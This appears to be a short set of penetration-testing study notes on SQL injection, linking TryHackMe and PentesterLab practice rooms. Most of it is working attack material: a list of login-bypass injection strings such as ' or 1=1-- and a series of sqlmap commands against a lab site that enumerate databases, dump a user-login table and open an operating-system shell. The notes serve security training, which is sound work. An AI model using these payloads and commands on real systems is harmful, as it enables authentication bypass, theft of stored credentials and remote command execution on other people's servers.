• THM Practice Rooms - https://tryhackme.com/room/sqlibasics, https://tryhackme.com/room/sqlilab

• Database Penetration Testing using Sqlmap (Part 1)

• If want to learn more - **https://www.pentesterlab.com/exercises/from_sqli_to_shell/course**

• Manual Testing, if found any login page

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1—

• SQLMap
  • iLabs pg no - 1633
  • sqlmap -u "<http://www.moviescope.com/viewprofile.aspx?id=1>" -cookie=<"cookie value which you have copied"> --dbs
  • sqlmap -u "<http://www.moviescope.com/viewprofile.aspx?id=1>" -cookie=<"cookie value which you have copied"> -D moviescope --tables
  • sqlmap -u "<http://www.moviescope.com/viewprofile.aspx?id=1>" -cookie=<"cookie value which you have copied"> -D moviescope -T User_Login --columns
  • sqlmap -u "<http://www.moviescope.com/viewprofile.aspx?id=1>" -cookie=<"cookie value which you have copied"> -D moviescope -T User_Login --dump
  • sqlmap -u "<http://www.moviescope.com/viewprofile.aspx?id=1>" -cookie=<"cookie value which you have copied"> -D moviescope -T User_Login --os-shell